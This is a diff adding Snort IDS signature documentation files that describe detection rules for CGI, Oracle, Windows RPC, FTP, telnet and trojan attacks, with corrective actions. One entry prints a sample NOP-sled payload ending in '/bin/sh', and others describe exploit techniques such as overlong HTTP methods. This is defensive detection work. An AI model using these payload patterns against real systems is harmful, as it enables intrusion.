+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1394.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+
+1394
+
+--
+Summary:
+This event is generated when an attempt is made to possibly overflow a buffer.
+
+The NOOP warning occurs when a series of NOOP (no operation) are found in a stream. Most buffer overflow exploits typically use NOOPs sleds to pad the code.
+
+--
+Impact:
+
+This might indicate someone is trying to use a buffer overflow exploit. 
+
+Full compromise of  system is possible if the exploit is successful.
+
+--
+Detailed Information:
+This rule detects a large number of consecutive NOOP instructions used in padding code. It's not specific to a particular service exploit, but rather used to try and detect buffer overflows in general. It is common for buffer overflow code to contain a large sequence of NOOP instructions as it increases the odds of successful execution of the useful shellcode. 
+
+--
+Affected Systems:
+
+	Any x86 programs.
+
+--
+Attack Scenarios:
+An attacker uses a buffer overflow exploit which contains the following payload:
+
+	90 90 90 90 90 90 90 90 90 90 /bin/sh
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+High, This event may be generated by applications such as ftp and http 
+when binary data is being transfered. 
+
+A false Positive can be generated if the snort sensor detects text from an IRC
+client or any other application that passes data plaintext. The event is
+generated if snort detects several (a) characters in a row - such as
+'aaaaaaaaaa'.
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+Apply a non-executable user stack patch to your kernel
+
+Secure programming/execution of a program
+
+Check the destination host and service to verify if any buffer overflow vulnerability exists.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3222.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3222
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2365.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2365
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application newsPHP.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+newsPHP contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable LangFile when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	newsPHP newsPHP 216
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the LangFile variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000483.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000483
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Wheatblog" application running on a webserver. 
+Access to the file "view_links.php" using a remote file being passed as the 
+"wb_inc_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "wb_inc_dir" parameter in the "view_links.php" script 
+used by the "Wheatblog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wheatblog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2641.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2641
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_site_instantiate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck629.html
+
+--
--- /dev/null
+++ b/doc/signatures/1625.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1625
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2483.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/257.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+257
+
+--
+Summary:
+This event is generated when an attempt is made to determine the version
+of BIND being used on a DNS server.
+
+--
+Impact:
+Information gathering. This activity may indicate reconnaisance before 
+an impending attack.
+
+--
+Detailed Information: 
+A remote machine attempted to determine the version of BIND running on a
+nameserver.
+
+--
+Affected Systems:
+	All DNS nameservers
+ 
+--
+Attack Scenarios:
+As part of reconnaissance leading upto a potential intrusion attempt, an
+attacker may attempt to determine the BIND version that is in use so
+that a vulnerable version can be used as an attack vector.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the ability for untrusted (remote) machines to determine the named
+version.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1016.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1016
+
+--
+Summary:
+This event is generated when an attempt is made to craft a URL containing a reference to the "/global.asa" file.
+
+--
+Impact:
+Intelligence gathering.  This attack may permit disclosure of the source code of global.asa file that is not normally available for viewing.
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) 5.0 contains scripting engines to support various advanced files types such as .ASP and .HTR.  The scripting engines permit the execution of server-side processing.  IIS determines which scripting engine is appropriate depending on the file extension.  If an attacker crafts a URL request ending in 'Translate: f' and followed by a slash '/', IIS fails to send the file to the appropriate scripting engine for processing.  Instead, it returns the source code of a referenced file, such as global.asa, to the browser.  The Nessus vulnerability scanner references the global.asa file in a GET request to determine whether a host is susceptible to this exploit.
+
+--
+Affected Systems:
+Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL that includes the 'Translate: f' followed by a '/' to disclose the source code of a file such as global.asa on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  The Nessus vulnerability scanner can test for this exploit. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1672.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1672
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with certain versions of the Sun Solaris FTP server.  
+
+--
+Impact:
+Reconnaissance.  An attacker may be able to examine records from the password shadow file.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with a globbing function in Sun Solaris FTP servers.  An attacker may exploit this vulnerability by logging into the FTP server with a valid username and an invalid password then supplying the command "CWD ~".  This may produce a core dump in the root directory with world-readable permissions that could be examined to discover valid FTP users for the server.  
+
+--
+Affected Systems:
+
+SPARC
+
+    * Solaris 2.5 without patch 103577-13
+    * Solaris 2.5.1 without patch 103603-16
+    * Solaris 2.6 without patch 106301-03
+    * Solaris 2.7 without patch 110646-02
+    * Solaris 2.8 without patch 111606-01
+
+Intel
+
+    * Solaris 2.5 without patch 103578-13
+    * Solaris 2.5.1 without patch 103604-16
+    * Solaris 2.6 without patch 106302-03
+    * Solaris 2.7 without patch 110647-02
+    * Solaris 2.8 without patch 111607-01
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability to learn valid FTP usernames to later attempt brute force guessing of passwords.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2601
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0421
+
+--
--- /dev/null
+++ b/doc/signatures/2771.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2771
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2961.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2961
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/532.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+532
+
+--
+Summary:
+This event is generated when an attempt is made to access an administrative share on a Windows machine.
+
+--
+Impact:
+Serious. Possible administrator access on the victim machine. 
+
+--
+Detailed Information:
+This rule  generates an event when the hidden Netbios share Admin$, which is the Winnt directory, is accessed via SMB. 
+
+This is a poor security practice or an indication that a machine is being accessed remotely. 
+
+--
+Affected Systems:
+	Windows 9x
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenario:
+This can be accessed from GUI "map network drive" remotely 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to disallow Netbios access from the unprotected network.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References:
+
+arachnids 340 
+
+--
--- /dev/null
+++ b/doc/signatures/2560.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2560
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1252.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1252
+
+--
+Summary:
+This event is generated after a sucessful exploit of the BSD derived Telnet daemon.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+compromise of a telnet server.
+
+--
+Detailed Information:
+This event is generated after a possible sucessful attempt to compromise
+a server running a BSD derived version of Telnet. A buffer overflow
+condition exists that may present an attacker with the opportunity to
+execute code of their choosing.
+
+The attacker does not need to login to the server to exploit this
+vulnerability, only a connection to the server is needed.
+
+--
+Affected Systems:
+	Multiple Vendor Telnet servers running versions of telnetd derived
+	from the BSD telnet daemon.
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available. This vulnerability may
+also be exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1661.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1661
+
+--
+Summary:
+This event is generated when an attempt is made to access the cmd32.exe file.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Detailed Information:
+The cmd32.exe file allows execution of commands on Windows hosts.  This file is only accessible if maliciously placed in the web server's root directory or an attacker performs unauthorized directory traversal.  This may permit the attacker to execute arbitrary commands on the vulnerable server.
+
+--
+Affected Systems:
+???
+
+--
+Attack Scenarios:
+An attacker can attempt to access the cmd32.exe file to execute arbitrary commands on the vulernable server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Make sure that the cmd32.exe is not in the webroot directory.
+
+Make sure that all appropriate patches have been applied.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1437.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+1437
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+This rule detects the following Windows Media file types:
+
+  File extension   MIME type
+     .wmz        application/x-ms-wmz
+     .wmd        application/x-ms-wmd
+     .wma        audio/x-ms-wma
+     .wax        audio/x-ms-wax
+     .wmv        audio/x-ms-wmv
+     .asf        video/x-ms-asf
+     .asx        video/x-ms-asf
+     .wvx        video/x-ms-wvx
+     .wm         video/x-ms-wm
+     .wmx        video/x-ms-wmx
+
+--
+Affected Systems:
+	All Windows systems running Windows Media player applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Windows Media file types:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;288102
+
+--
--- /dev/null
+++ b/doc/signatures/1113.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1113
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1676.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1676
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2255.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2255
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access.  This attack may permit execution of arbitrary commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite 
+applications to perform remote distributed system administration tasks 
+such as adding new users.  
+
+This event indicates that an RPC query for the sadmind service has been
+made with the credentials of the root user supplied.
+
+This may permit execution of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+All systems using sadmind
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root access to the remote host.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/195.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+195
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
